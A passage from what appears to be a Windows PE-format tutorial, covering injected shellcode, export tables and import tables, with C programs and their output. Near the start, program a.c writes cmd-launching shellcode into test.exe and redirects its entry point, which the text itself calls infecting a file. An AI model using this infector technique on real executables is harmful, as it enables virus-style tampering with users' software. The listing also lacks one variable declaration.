6A 05 push
5
8B C5 mov
eax,ebp
83 E8 04 sub
eax,4
50 push
eax
B8 AF A7 E9 77 mov eax,77E9A7AFh
FF D0 call
eax
8B E5 mov
esp,ebp
5D pop
ebp
The explanation for the assembler
code is the same, as from the previous chapter.
The first instruction is the
breakpoint interrupt CC. Then 55 becomes push ebp. One of the many reasons a
register is pushed on the stack is because its value is to be changed and
eventually the original value is to be restored at the end of the code. A
simple rule in assembler is whenever a register is changed, like decent people
once the task is done, it has to be restored back to its original value. The
next instruction replaces the contents of the ebp register with that of esp.
The esp register tracks down the stack each time a value is pushed or popped
off it. Thus by storing a copy of esp in ebp which will not be changed, we now
have a reference to original position of the stack is prior to the vcd code
being called. Besides there is now a fixed reference point off the stack to
refer to values on the stack. When our vcd code finishes, it should restore the
stack to its original value. Thus the vcd code should once again copy ebp back
to esp to restore the stack.
The actual work starts now. We push
ecx on the stack. By pushing its value, we have actually allocated 4 memory
locations on the stack, though its value is insignificant for the moment. The
stack moves down by 4 and hence the difference between esp and ebp will be 4.
Thus ebp-4 will represent the value we have just pushed on the stack.
The string cmd is to be placed on the
stack. Thus the next instruction copies the ASCII values of c, m and d 63,6d
and 64 on the stack at ebp-4, the position where we pushed the value of the ecx
register. Being a little endian machine the 63h or c comes last. The square
brackets in assembler reference a pointer.
If ebp had a value 100, then
characters cmd would be stored at locations 96 onwards. Thus we have allocated
4 bytes on the stack and copied our string there. In assembler, we are allowed
to write to memory that has been previously allocated.
The WinExec function takes two
parameters, the name of the program to be executed and the initial mode the
window should be open in, The value 5 means normal, therefore we push 5 on the
stack, the parameters are to be pushed in the reverse way. Then the address of
where the string cmd starts in memory is to be placed which in our case is
ebp-4.
To make matters easier, we first mov
ebp into eax, subtract 4 from it and then push this value on the stack.
Finally, the function WinExec is called. However, our problem is that we have
no clue where this function starts in memory. Thus we use function LoadLibrary
to retrieve the address location of kernel32.dll as this dll that contains the
code of the WinExec functions starts in memory.
Then using function GetProcAddress,
we retrieve the address of this function in the dll and thus in memory. Once
the value is attained, using the mov instruction this value is placed into the
eax register. The op code B8 followed by the address in memory of our function
does this job. Then the address of WinExec is to be placed at this point which
is 10 bytes from the end. For this reason, we extract each bytes of the address
of WinExec which is 77e9a7af and place in into our array vcdcode. This value of
WinExec will change from Windows version to version and service pack and hence
it is not hard coded.
Once its address is obtained, it is
moved into the eax register and then the call eax op code is used to call the
code of WinExec. Resultantly, this opens the DOS command box.
Mission Accomplished.
The clean up task now requires the stack to be put back to its original position, so we move the value of ebp back into esp. As the stack pointer now points at the value saved at the start, we simply pop the original value of ebp back into the ebp register.
A small glitch here is that in spite
of opening the dos box, the original code does not get called at all. This is
rectified in the next program.
All that this program does is hands
over control back to the original code.
a.c
#include <windows.h>
#include <stdio.h>
struct section {
BYTE Name[8];
DWORD VirtualSize;
DWORD VirtualAddress;
DWORD SizeOfRawData;
DWORD PointerToRawData;
char a[16];
};
void main()
{
unsigned char
vcdcode[]="\xcc\x55\x8B\xEC\x51\xC7\x45\xFC\x63\x6D\x64\x00\x6A\x05\x8b\xc5\x83\xe8\x04\x50\xB8\xcc\xcc\xcc\xcc\xFF\xD0\x8B\xE5\x5d";
section *psection;
HMODULE hloadlibrary;
HANDLE hfile,hfile1;
unsigned char *pmappedfile;
long positionofvcd,haddresoffunction;
int howmanyzeroes=0,i;
hfile =
CreateFile("test.exe",GENERIC_WRITE |
GENERIC_READ,0,0,OPEN_EXISTING,0,0);
hfile1 = CreateFileMapping (hfile, 0,
PAGE_READWRITE, 0, 0, 0);
pmappedfile = (unsigned char
*)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);
IMAGE_DOS_HEADER
*pimagedosheader = (IMAGE_DOS_HEADER
*)pmappedfile;
IMAGE_OPTIONAL_HEADER
*pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char *)pimagefileheader+sizeof(IMAGE_FILE_HEADER));
psection = (struct section*)((char
*)pimageoptionalheader + sizeof(IMAGE_OPTIONAL_HEADER));
int totalsize =
psection->PointerToRawData + psection->SizeOfRawData;
for(positionofvcd=psection->PointerToRawData;positionofvcd
<= totalsize;positionofvcd++)
{
if(pmappedfile[positionofvcd]==0)
{
howmanyzeroes++;
if(howmanyzeroes==69)
break;
}
else
howmanyzeroes=0;
}
positionofvcd -= 65;
long goingback =
pimageoptionalheader->AddressOfEntryPoint+pimageoptionalheader->ImageBase;
pimageoptionalheader->AddressOfEntryPoint
= positionofvcd + psection->VirtualAddress - psection->PointerToRawData;
int sizeofvcd = sizeof(vcdcode);
hloadlibrary =
LoadLibrary("kernel32.dll");
haddresoffunction = (unsigned
long)GetProcAddress(hloadlibrary,"WinExec");
for (i = 0; i < 4 ; i++)
vcdcode[sizeofvcd-10+i] =
haddresoffunction >> (i * 8);
for(i =0; i<sizeofvcd ;i++)
pmappedfile[positionofvcd+i]=vcdcode[i];
unsigned char
jumpback[]="\xB8\xbb\xbb\xbb\xbb\xff\xe0";
for (i = 0; i < 4 ; i++)
jumpback[1+i] = goingback >> (i
* 8);
for(i=0; i<7 ;i++)
pmappedfile[positionofvcd+sizeofvcd+i-1]=jumpback[i];
}
The AddressOfEntryPoint member stores
the address of code that is to be executed. Thus before changing its value to point
to our vcd code, we save the original value in a variable called goingback. The
point to be noted is that the address is an RVA therefore to reach the actual
physical address we add the ImageBase value to it.
Next is we create an array jumpback
that will carry code that jumps back to the original entry point. Once again it
starts with op code b8 that moves a value into the eax register. As before, a
for loop is used to write the actual jump address in this array using the
goingback variable.
Then these 7 bytes are added to the
end of the vcd so that after the dos box gets created and it is shut down, the
original code is executed. The actual bytes that get executed are as follows.
B8 20 24 01 01 mov
eax,1012420h
FF E0 jmp eax
The difference between a call and a jmp
instruction is that jmp does not save the address of the next instruction on
the stack, because control is not expected to return.
Thus the code will infect a file in
such a way that each time the file is executed, a dos box gets created and then
the original code gets called.
The Exports Table.
e.c
void __declspec(dllexport) abc()
{
}
void __declspec(dllexport) pqr()
{
}
void xyz()
{
}
void aaa()
{
}
void bbb()
{
}
void ccc()
{
}
e.def
LIBRARY e.dll
EXPORTS
xyz @5
aaa @7
bbb @12
cl -c e.c
link /dll /def:e.def e.obj
The above program continues with what
we are learning about the structure of a PE file. In file e.c, there are six
functions, namely abc, pqr, xyz, aaa, bbb and ccc. All six are placed in the
dll, but only five of them (all except ccc) can be called by other code.
By default, code in a dll is not exposed to the outside world.
There are two ways of
giving permission to access code present in the dll. The first approach is by
tagging the functions with the keyword __declspec along with the option
dllexport. The first two functions abc and pqr are exported in this way.
The second alternative is by using a
definitions (.def) file. A def file has a certain format, which is clearly seen
in file e.def. It starts with the reserved word LIBRARY followed by the library
name. If the name of the library is changed to e1.dll, the linker names the dll
e1.dll. Then the keyword EXPORTS is specified, followed by the list of
functions to be exported, here xyz, aaa and bbb.
An exported function of a dll can be
located at run time with the Win32 function GetProcAddress, which takes either
the name of the function or its ordinal number. In the def file, the ordinal is
the number given after the @ that follows the function name. Using an ordinal
number is normally not advisable as it may vary from one version of the dll to
another.
The function xyz is given an ordinal
number of 5, the function aaa 7 and the function bbb 12. If the ordinal number
is not specified, a default is chosen, beginning with 1 and increasing
sequentially.
The indentation is there for display
purposes only; most def files indent the function name also.
The exported functions in a dll are recorded
in the exports section along with their locations in the dll.
The program given below, displays the
exports data in the file e.dll.
#include <windows.h>
#include <stdio.h>
#include <time.h>
void main()
{
int i;
HANDLE hfile,hfile1;
unsigned char *pmappedfile;
hfile =
CreateFile("e.dll",GENERIC_WRITE |
GENERIC_READ,0,0,OPEN_EXISTING,0,0);
hfile1 = CreateFileMapping (hfile, 0,
PAGE_READWRITE, 0, 0, 0);
pmappedfile = (unsigned char
*)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);
printf("pmappedfile=%p\n",pmappedfile);
IMAGE_DOS_HEADER
*pimagedosheader = (IMAGE_DOS_HEADER
*)pmappedfile;
IMAGE_FILE_HEADER *pimagefileheader =
(IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);
IMAGE_OPTIONAL_HEADER
*pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char
*)pimagefileheader+sizeof(IMAGE_FILE_HEADER));
PIMAGE_SECTION_HEADER psectionheader;
psectionheader =
(PIMAGE_SECTION_HEADER)((char *)pimageoptionalheader +
sizeof(IMAGE_OPTIONAL_HEADER));
DWORD
beginexportsrva,endexportsrva,diff,startoffile;
beginexportsrva =
pimageoptionalheader->DataDirectory[0].VirtualAddress;
endexportsrva = beginexportsrva +
pimageoptionalheader->DataDirectory[0].Size;
printf("beginexportsrva=%p
Size=%x endexportsrva=%p\n",beginexportsrva,pimageoptionalheader->DataDirectory[0].Size,endexportsrva);
printf("Sec No Name Virtual Address PointerToRawData
VirtualSize\n");
for ( i=0; i <
pimagefileheader->NumberOfSections; i++, psectionheader++ )
{
printf("%d %6s
%x %x %x\n",i,psectionheader->Name,psectionheader->VirtualAddress,psectionheader->PointerToRawData,psectionheader->Misc.VirtualSize);
if ( (beginexportsrva >=
psectionheader->VirtualAddress) && (endexportsrva <=
(psectionheader->VirtualAddress + psectionheader->Misc.VirtualSize)))
break;
}
diff =
(INT)(psectionheader->VirtualAddress - psectionheader->PointerToRawData);
printf("diff=%d
%x\n",diff,diff);
PIMAGE_EXPORT_DIRECTORY
pexportdirectory;
startoffile = (DWORD)pmappedfile;
pexportdirectory =
(PIMAGE_EXPORT_DIRECTORY)(startoffile + beginexportsrva - diff);
printf("pexportdirectory=%p\n",pexportdirectory);
char *nameoffile;
nameoffile = (PSTR)(pexportdirectory->Name - diff + startoffile);
printf("FileName:%s %x\n",
nameoffile,nameoffile);
printf("Characteristics:%08X\n",
pexportdirectory->Characteristics);
printf("TimeDateStamp:%08X
%s",pexportdirectory->TimeDateStamp,ctime((long
*)&pexportdirectory->TimeDateStamp));
printf("Version
Number:Major.Minor %u.%02u\n",
pexportdirectory->MajorVersion,pexportdirectory->MinorVersion);
printf("Ordinal Numbers Starting
From:%08X\n", pexportdirectory->Base);
printf("Number of
functions:%08X\n", pexportdirectory->NumberOfFunctions);
printf("Number of
Names:%08X\n", pexportdirectory->NumberOfNames);
printf("Address of functions array
rva=%08x\n",pexportdirectory->AddressOfFunctions);
printf("Address of names array
rva=%08x\n",pexportdirectory->AddressOfNames);
printf("Address of ordinals
array rva=%08x\n",pexportdirectory->AddressOfNameOrdinals);
long *pfunctionsactual;
short *pordinalsactual;
pfunctionsactual = (long
*)((int)pexportdirectory->AddressOfFunctions - diff + startoffile);
pordinalsactual = (short
*)((int)pexportdirectory->AddressOfNameOrdinals - diff + startoffile);
char **ppnamesactual;
ppnamesactual = (char **)((int)pexportdirectory->AddressOfNames
- diff + startoffile);
printf("\ni Entry Pt
Ordn Name\n");
for ( i=0; i <
pexportdirectory->NumberOfFunctions; i++ )
{
DWORD startoffunctionsrva =
pfunctionsactual[i];
DWORD j;
if ( startoffunctionsrva == 0 )
continue;
printf("%d %08X
%4u", i , startoffunctionsrva, i + pexportdirectory->Base );
for ( j=0; j <
pexportdirectory->NumberOfNames; j++ )
if ( pordinalsactual[j] == i )
printf(" %s", ppnamesactual[j] - diff +
startoffile);
if ( (startoffunctionsrva >=
beginexportsrva) && (startoffunctionsrva <= endexportsrva) )
printf(" (forwarder ->
%s)", startoffunctionsrva - diff + startoffile );
printf("\n");
}
printf("Array of Address of
Functions\n");
for ( i = 0 ; i <
pexportdirectory->NumberOfFunctions; i++)
printf("%d
%08X\n",i,pfunctionsactual[i]);
printf("Array of
NameOrdinals\n");
for ( i = 0 ; i <
pexportdirectory->NumberOfNames; i++)
printf("%d
%08X\n",i,pordinalsactual[i]);
printf("Names of
functions\n");
for ( i = 0 ; i <
pexportdirectory->NumberOfNames; i++)
printf("%d %08X
%s\n",i,ppnamesactual[i] - diff + startoffile , ppnamesactual[i] - diff +
startoffile);
}
pmappedfile=00310000
beginexportsrva=00004710 Size=80
endexportsrva=00004790
Sec No Name Virtual Address PointerToRawData VirtualSize
0 .text 1000 1000 275e
1 .rdata 4000 4000 790
diff=0 0
pexportdirectory=00424710
FileName:e.dll 424776
Characteristics:00000000
TimeDateStamp:3FEBF2B2 Fri Dec 26
14:04:58 2003
Version Number:Major.Minor 0.00
Ordinal Numbers Starting
From:00000005
Number of functions:00000008
Number of Names:00000005
Address of functions array
rva=00004738
Address of names array rva=00004758
Address of ordinals array
rva=0000476c
i Entry Pt Ordn Name
0 0000100A 5 xyz
1 00001000 6 abc
2 0000100F 7 aaa
3 00001005 8 pqr
7 00001014 12 bbb
Array of Address of Functions
0 0000100A
1 00001000
2 0000100F
3 00001005
4 00000000
5 00000000
6 00000000
7 00001014
Array of NameOrdinals
0 00000002
1 00000001
2 00000007
3 00000003
4 00000000
Names of functions
0 0042477C aaa
1 00424780 abc
2 00424784 bbb
3 00424788 pqr
4 0042478C xyz
The above program displays the
exports data in the file e.dll.
The initial part of the program remains the same as before. The functions
CreateFile, CreateFileMapping and MapViewOfFile map the dll e.dll into
memory, here at memory location 310000. The start of a PE file contains a DOS
header that gives the location of the PE header. After the characters P,E,0,0
comes the Image File header, which is followed by the Image Optional header. The
optional header is followed by the section headers. These headers have been
explained earlier on, except for the DataDirectory array at the end of the
Optional header. Each element of this array is a structure with two members,
VirtualAddress and Size. VirtualAddress gives the RVA of a particular set of
data and Size gives its size in bytes.
The first structure of the Data
Directory structure stores details on the exports information whereas the
second one is on the imports data. We
will limit our learning to these two structures for the time being.
The first DataDirectory structure
states that the exports data begins at RVA 0x4710 and that its size is 0x80
bytes. Thus in effect, export data takes up only 128 bytes.
An RVA is an offset from the address at which the loader places the start of
the file in memory. Remember that the loader does not lay the file out in memory
in the same manner as the map functions. The map functions give a byte-for-byte
copy of the file on disk, whereas the loader breaks the file up into sections
and places each section in memory as directed by its section header.
It is for this reason that we now
need to find out which section stores the exports data. The only way out is by
iterating through the section headers and looking for the section that contains
the RVA 0x4710, the value stored in variable beginexportsrva. At the same
time, the section details are displayed again.
In the if statement we check if the
variable beginexportsrva, the start of the exports data, is greater than or
equal to the VirtualAddress field, i.e. the start of the section in memory. The
section should also be large enough to contain the export data. This is done by
checking that the end of the exports data is less than or equal to the
VirtualAddress plus the size of the section.
The first section starts at an RVA of
0x1000 or 4096 bytes, as the file starts with the headers. Since the section
alignment is 4096 bytes, each section starts at a multiple of 4096 irrespective
of the size of the section data. The section called .rdata starts at rva 0x4000
and has a size of 0x790 bytes, therefore it ends at 0x4790. The exports data
starts at 0x4710, which is not below 0x4000, and its end, endexportsrva, is
0x4790, which is not beyond the end of the section.
Since the if statement results in
true for the second section, the loop is terminated with the details of the
second section being stored in the psectionheader variable.
A variable called diff holds the
VirtualAddress of the section minus its PointerToRawData. It works out to
zero in the case of e.dll, but for a dll like kernel32.dll it has the value
0xc00, as the exports data is found in the first section, which is loaded
in memory at 0x1000 while its pointer to raw data has a value of 0x400.
Thus on the disk, the section of kernel32
that holds the exports starts 0x400 bytes from the start of the file, but in
memory, when the actual loader loads it, the section is placed at 0x1000.
As a result, since we are using the map functions to read the file, the value
of diff must be subtracted from every rva to arrive at the right offset in the
mapped file. The rva's are always with respect to where the loader would place
the file in memory, not to the file on disk. Some linker settings, such as the
ones used for e.dll, give the rva and the pointer to raw data of a section the
same value, in which case diff is zero.
The variable startoffile is made
equal to pmappedfile and indicates the start of the file in memory. Then the
actual start of the exports directory, pexportdirectory, is computed as
startoffile plus the rva held in beginexportsrva minus the diff variable, which
for e.dll is zero. In the run shown, the exports data is
stored at memory location 00424710.
This data is laid out as an
IMAGE_EXPORT_DIRECTORY structure, which makes it easy to display
some of its members.
The first item displayed is the name of the
dll, a string stored at memory location 424776. Then comes a field called
Characteristics whose present value is zero. This is followed by the date time
stamp, a 32-bit count of seconds. This value can be converted to a string
using the function called ctime. This is followed by the major and minor version
numbers which are also zero.
In the def file, the first function
xyz is given an ordinal number 5, the function aaa an ordinal number of 7 and
function bbb 12. The abc and pqr functions are not given any ordinal numbers.
Thus our ordinal number starting
point is 5, and as we have not given the abc function an ordinal number it is
given the value 6. The def file overrules everything, and as the aaa function
has an ordinal number of 7, the pqr function is given an ordinal number of 8.
Finally bbb has 12.
Thus the def file decides the ordinal
numbers, and the functions that do not have ordinal numbers are given the ones
in the middle. The Base member of the exports directory gives us the starting
point of the ordinal numbers, in our case 5. The next two members, Number of
Functions and Number of Names, are often the same, though not for e.dll.
The Number of Functions member tells
us how many entries the array of function addresses has. It counts every
ordinal from the base to the highest one in use, empty gaps included. The
Number of Names member gives us the number of functions that are exported by
name. If you look at the def file for e.dll, the last function bbb is given an
ordinal number of 12 and the second last function pqr has an ordinal number of 8.
Thus the array of function addresses has
to have 3 empty members to account for the ordinal numbers 9, 10 and 11 that
have no functions. This array has as many members as the last ordinal
number minus the ordinal base plus one, here 12 - 5 + 1 or 8. Thus if we change
the ordinal number of the last function bbb to 100, the Number of
functions will change to 96.
Each function that we export has
three bits of information associated with it. The first is the rva of where the
function starts in memory. Then its ordinal number and finally its name. Thus
in the exports directory we have three arrays which store the above data.
The members AddressOfFunctions,
AddressOfNames and AddressOfNameOrdinals hold the rvas of these arrays.
Although we have only five exported functions, the array of function addresses
has 8 members of 4 bytes each and is 32 bytes in size, as three members are
zero to account for the empty slots 9, 10 and 11. These
three arrays are stored back to back.
The array of function addresses starts at
00004738, followed by the array of names at 00004758 which is 32 bytes
away. The array of name ordinals starts at 0000476c which is 20 bytes further
on, as the array of names has only 5 members of 4 bytes each, one for each
exported name. Thus the three array
sizes are not equal.
Now as always we want to convert
these numbers to our memory space and thus we create three new variables by
adding startoffile and subtracting diff. We have to now display the details of
the exported functions stored in these three arrays. We use the member
NumberOfFunctions to decide how long the
loop iterates. We first check if the entry in the array of function addresses
is zero.
If yes we know that no such function
exists and thus go back to start of the loop. Remember there are no functions
for ordinal numbers 9, 10 and 11. These entries will have a value of zero. We
display the address of the function and then the ordinal number. The loop
variable i is added to the ordinal base to give us the ordinal number.
If this gets a little difficult, we
have also displayed at the end of the program the contents of the three arrays.
The length of the first array, which gives us the addresses of the functions,
is decided by the last ordinal number minus the ordinal base plus one, which in
our case works out to 12 - 5 + 1 or 8.
The missing ordinal numbers have a
zero as the value. The first function has the ordinal number of the member
Ordinal Base and the next function an ordinal number that is increased by 1.
Now starts the complication. The Name Ordinals array is not ordered at all and
contains the same number of members as the array of names.
So if we want to find the name of the
function with ordinal number 6, the function abc, we know that as it is the
second function, the value of i is 1. The loop variable is the ordinal number
minus the ordinal base. We thus scan the Name Ordinals array for a member whose
value is 1 and not 6.
The values in the Name Ordinals array
are not the ordinal numbers but ordinal numbers minus ordinal base. The
position of a value in the Name Ordinals array is also the position of the
matching entry in the Names array. Thus the
system first stores the names of the functions in memory and the addresses of
these names in the Names array.
Then it fills up the Name Ordinals
array with the values corresponding to the names. Thus the first
member of the Names array contains the address of aaa and the first member of
the Name Ordinals array its ordinal number minus the base, 7 - 5 or 2. The
last member of the Names array stores the address of the name xyz, and as its
ordinal number is 5, the last member of the Name Ordinals array has a value of
5 - 5 i.e. 0.
The Address of Functions array is
indexed on ordinal number minus ordinal base. As you may have noticed, the
Names array is sorted on the name of the function. Thus we first read the
address of the function; its index into the array is the ordinal number minus
the ordinal base. We then look for that index among the values of the Name
Ordinals array. The position at which it is found gives
us the address of the name in the Names array.
The Imports table.
d.c
#include <windows.h>
main()
{
MessageBox(0,"hi","bye",0);
MessageBox(0,"hi1","bye1",0);
GetDC(0);
ReleaseDC(0,0);
}
cl d.c user32.lib
Microsoft has given plenty of dlls
from where code can be easily picked up when writing any code. However, this
code does not physically get added to the exe file but instead, a list is
maintained of all the dlls along with the functions used from them. This list is
called the imports section.
In the above exe file d.exe, three
functions are called from the dll user32.dll. Let us now display the import data
section stored in file d.exe.
b.cpp
#include <windows.h>
#include <stdio.h>
#include <time.h>
void main()
{
HANDLE hfile,hfile1;
int i;
unsigned char *pmappedfile, *dummy;
hfile =
CreateFile("d.exe",GENERIC_WRITE |
GENERIC_READ,0,0,OPEN_EXISTING,0,0);
hfile1 = CreateFileMapping (hfile, 0,
PAGE_READWRITE, 0, 0, 0);
pmappedfile = (unsigned char
*)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);
IMAGE_DOS_HEADER
*pimagedosheader = (IMAGE_DOS_HEADER
*)pmappedfile;
dummy = (unsigned char *)(pmappedfile +
pimagedosheader->e_lfanew);
IMAGE_FILE_HEADER *pimagefileheader =
(IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);
IMAGE_OPTIONAL_HEADER
*pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char
*)pimagefileheader+sizeof(IMAGE_FILE_HEADER));
PIMAGE_SECTION_HEADER psectionheader;
psectionheader =
(PIMAGE_SECTION_HEADER)((char *)pimageoptionalheader + sizeof(IMAGE_OPTIONAL_HEADER));
DWORD importstartrva,importendrva;
importstartrva =
pimageoptionalheader->DataDirectory[1].VirtualAddress;
importendrva = importstartrva +
pimageoptionalheader->DataDirectory[1].Size;
printf("importstartrva=%x
size=%x\n",importstartrva,pimageoptionalheader->DataDirectory[1].Size);
printf("Section No Name Virtual Address PointerToRawData
VirtualSize\n");
for ( i=0; i <
pimagefileheader->NumberOfSections; i++, psectionheader++ )
{
printf("%2d %-7s %x %x %x\n",i,psectionheader->Name,psectionheader->VirtualAddress,psectionheader->PointerToRawData,psectionheader->Misc.VirtualSize);
if ( (importstartrva >= psectionheader->VirtualAddress)
&& (importstartrva < (psectionheader->VirtualAddress +
psectionheader->Misc.VirtualSize)))
break;
}
DWORD diff,startoffile;
diff =
(INT)(psectionheader->VirtualAddress - psectionheader->PointerToRawData);
PIMAGE_IMPORT_DESCRIPTOR
pimportDescriptor;
startoffile = (DWORD)pmappedfile;
pimportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(startoffile
+ importstartrva - diff);
printf("psectionheader=%x
pimportDescriptor=%x\n",psectionheader , pimportDescriptor);
while ( 1 )
{
if (
(pimportDescriptor->TimeDateStamp==0 ) &&
(pimportDescriptor->Name==0) )
break;
printf("Name of Dll:%s\n",
pimportDescriptor->Name -diff + startoffile );
printf("Characteristics:%08X
(Unbound IAT)\n",pimportDescriptor->Characteristics);
printf("TimeDateStamp:%08X
%s",pimportDescriptor->TimeDateStamp,ctime((PLONG)&pimportDescriptor->TimeDateStamp));
printf("ForwarderChain:%08X\n",pimportDescriptor->ForwarderChain);
printf("First thunk
RVA:%08X\n",pimportDescriptor->FirstThunk);
PIMAGE_THUNK_DATA
pthunkdata,pthunkdatafirst;
long *pFirstThunk;
pthunkdata =
(PIMAGE_THUNK_DATA)pimportDescriptor->Characteristics;
pFirstThunk = (long
*)pimportDescriptor->FirstThunk;
pthunkdatafirst =
(PIMAGE_THUNK_DATA)pimportDescriptor->FirstThunk;
pthunkdatafirst =
(PIMAGE_THUNK_DATA)((DWORD)pthunkdatafirst - diff + startoffile);
pthunkdata = (PIMAGE_THUNK_DATA)((DWORD)pthunkdata
- diff + startoffile);
pFirstThunk = (long
*)((DWORD)pFirstThunk - diff + startoffile);
if (!pthunkdata)
return;
printf(" Ordn
Name\n");
while ( 1 )
{
if ( pthunkdata->u1.AddressOfData
== 0 )
break;
if ( pthunkdata->u1.Ordinal & IMAGE_ORDINAL_FLAG
)
{
printf( " %4u",
IMAGE_ORDINAL(pthunkdata->u1.Ordinal) );
}
else
{
PIMAGE_IMPORT_BY_NAME pimportbyname;
pimportbyname =
pthunkdata->u1.AddressOfData;
pimportbyname =
(PIMAGE_IMPORT_BY_NAME)((DWORD)pimportbyname - diff + startoffile);
printf(" %4u
%s Memory=%x Value=%x", pimportbyname->Hint,
pimportbyname->Name,pFirstThunk,*pFirstThunk);
}
if (
pimportDescriptor->TimeDateStamp )
printf( " (Bound to:
%08X)", pthunkdatafirst->u1.Function );
printf( "\n" );
pthunkdata++;
pFirstThunk++;
}
pimportDescriptor++;
printf("\n");
}
}
Output
importstartrva=4404 size=3c
Section No Name Virtual Address PointerToRawData VirtualSize
0 .text 1000 1000 280e
1 .rdata 4000 4000 778
psectionheader=4201e8 pimportDescriptor=424404
Name of Dll:USER32.dll
Characteristics:000044D0 (Unbound IAT)
TimeDateStamp:00000000 Thu Jan 01 05:30:00 1970
ForwarderChain:00000000
First thunk RVA:00004090
Ordn Name
515 ReleaseDC Memory=424090 Value=44e0
446 MessageBoxA Memory=424094 Value=44f4
253 GetDC Memory=424098 Value=44ec
Name of Dll:KERNEL32.dll
Characteristics:00004440 (Unbound IAT)
TimeDateStamp:00000000 Thu Jan 01 05:30:00 1970
ForwarderChain:00000000
First thunk RVA:00004000
Ordn Name
413 HeapDestroy Memory=424000 Value=4654
411 HeapCreate Memory=424004 Value=4662
342 GetStringTypeW Memory=424008 Value=4758
339 GetStringTypeA Memory=42400c Value=4746
202 GetCommandLineA Memory=424010 Value=450e
The first half of the program remains
almost the same as in the exports program. Here, the 2nd member of
the Data Directory contains the rva and the size of the imports section. The
rva in our case is 4404 and its size 3c bytes.
The start and end of the imports data
are placed in variables importstartrva and importendrva. The section that
contains the imports data is the .rdata section as before, and the diff and
startoffile variables are initialized in the same manner as before. Nothing
changes. Thus the import data starts at location 424404.
The import data is made up of a
series of structures called the Import Descriptor structures. There is one
structure for each dll from where the code is imported. Also, every C program
imports code from kernel32.dll due to the startup code added by the compiler.
As a result, there are two such structures back to back in our import area, one
for user32 and the other for kernel32.
The end of the import area is denoted
by an Import Descriptor structure that has all its members zeroed out. Thus a
while loop is implemented which exits when the members are all zero. Here the
name and Date Time stamp field are checked to be zero for exit.
The Name of the dll is displayed first.
It is an rva, and hence startoffile is to be added and diff is to be
subtracted like in the exports program.
The Characteristics field, which is not
zero, is printed along with the Date Time stamp and the Forwarder Chain, which
are zero. The most crucial field is FirstThunk, which is an rva having a value
of 0x4090.
Both Characteristics
and FirstThunk are rvas that point to a series of what are called Image Thunk
Data structures, which lead to the names of the functions imported from this
dll. In winnt.h the Characteristics field shares its storage with a member
called OriginalFirstThunk. The variable pthunkdata is initialized from
Characteristics, and pthunkdatafirst and pFirstThunk from FirstThunk. As they
are simply rvas at this point, all three are then converted to actual memory
locations by subtracting diff and adding startoffile. Then again, it could so
happen that the field Characteristics is zero, which the program treats as a
reason to stop.
Now to display the names of the functions
called from one dll, the inner loop is brought in. The variable pthunkdata,
which represents the Characteristics field, is nothing
but a pointer to a series of Image Thunk Data structures. Like the structures
representing dlls, an empty Thunk Data structure denotes the end of the function
names being called from this dll. Thus if the AddressOfData member is zero, the
inner loop is terminated. The if statement tests whether the function is
imported by ordinal number alone. This is generally not the case, so the else
block runs. There the
AddressOfData member points to an Image Import By Name structure. Since it is
an rva, its actual location is worked out and then two members, Hint and Name,
are displayed. The Hint is a suggested index into the names array of the
exporting dll that lets the loader find the name faster. It is not the ordinal
number, even though the program prints it under the Ordn heading. The variable
pthunkdata is
then incremented to point to the next structure. Once the inner while ends, the
variable pimportDescriptor is incremented in the outer while to point
to the next such structure.
The FirstThunk member for user32.dll
has a value of 4090, again an rva. The variable pFirstThunk, which is a pointer
to a long, is set to this FirstThunk value after being converted to an actual
memory location. We display the variable for each function called from the dll
and also increment its value. The contents present in this memory are also
displayed.
The imports data gives a listing of
only the functions called from each dll. When we install Visual C++ we get a
program called dumpbin that displays the internals of a PE file.
Run dumpbin on d.exe as dumpbin
/DISASM d.exe. The DISASM option disassembles the code in our
exe file.
00401000: 55                 push ebp
00401001: 8B EC              mov ebp,esp
00401003: 6A 00              push 0
00401005: 68 30 50 40 00     push 405030h
0040100A: 68 34 50 40 00     push 405034h
0040100F: 6A 00              push 0
00401011: FF 15 94 40 40 00  call dword ptr ds:[00404094h]
00401017: 6A 00              push 0
00401019: 68 38 50 40 00     push 405038h
0040101E: 68 40 50 40 00     push 405040h
00401023: 6A 00              push 0
00401025: FF 15 94 40 40 00  call dword ptr ds:[00404094h]
0040102B: 6A 00              push 0
0040102D: FF 15 98 40 40 00  call dword ptr ds:[00404098h]
00401033: 6A 00              push 0
00401035: 6A 00              push 0
00401037: FF 15 90 40 40 00  call dword ptr ds:[00404090h]
0040103D: 5D                 pop ebp
0040103E: C3                 ret
The first two calls are to the
MessageBoxA function. The compiler/linker combo however is not informed of the
address of the function MessageBoxA. All it knows is that the library
user32.lib has the function's name and its ordinal number.
The address of the function in the
dll is not stored in the lib file. Even though the dll user32 is present on our
machine and its exports section contains the address of the function
MessageBoxA, the linker does not bring in this address at all. Do remember that
the dll need not be present on the machine the program is being linked on; the
lib file suffices.
The function's address in the dll is
an rva from where the dll is loaded in memory.
Thus to get at the real address, it is important to know the location
of the dll in memory. Though this information could be extracted by the linker,
it is not, for the simple reason that the exe file may be built on one
machine and executed on another.
If that is the case, user32.dll may
be loaded somewhere else in memory and thus the absolute addresses of the
functions change, even though the rvas may be the same. A different version of
the dll may also store the function at a different place. The placement of a
dll in memory is decided by the operating system and its service pack. Thus it
is the job of the runtime loader to figure out the address of the function in
memory.
Thus the absolute addresses of the
functions cannot be determined at link time. The second hurdle is that one
function can be called many times in a program, like printf or MessageBox.
There is no way one would expect the loader to read the program code at runtime
and replace every occurrence of the call to, say, the MessageBoxA function with
the address of the function in memory on that machine. This would simply take
too long.
Thus when a program is executed, the
system does the normal sanity checks. In the disassembled code, the call to the
MessageBoxA function is an indirect call. The system is directed to go to
memory location 404094 and execute a function whose address is stored at that
location.
When the import table is displayed,
the FirstThunk member points to 404090, thus for MessageBoxA the location is
404094 as it is the second function. Thus to simplify matters for the loader,
all that it does at runtime is read the import section.
The Characteristics member gives it
the function name and hint, and the FirstThunk member gives it a
corresponding memory location, which the program code assumes will contain the
address of that function. Thus the loader figures out the address of
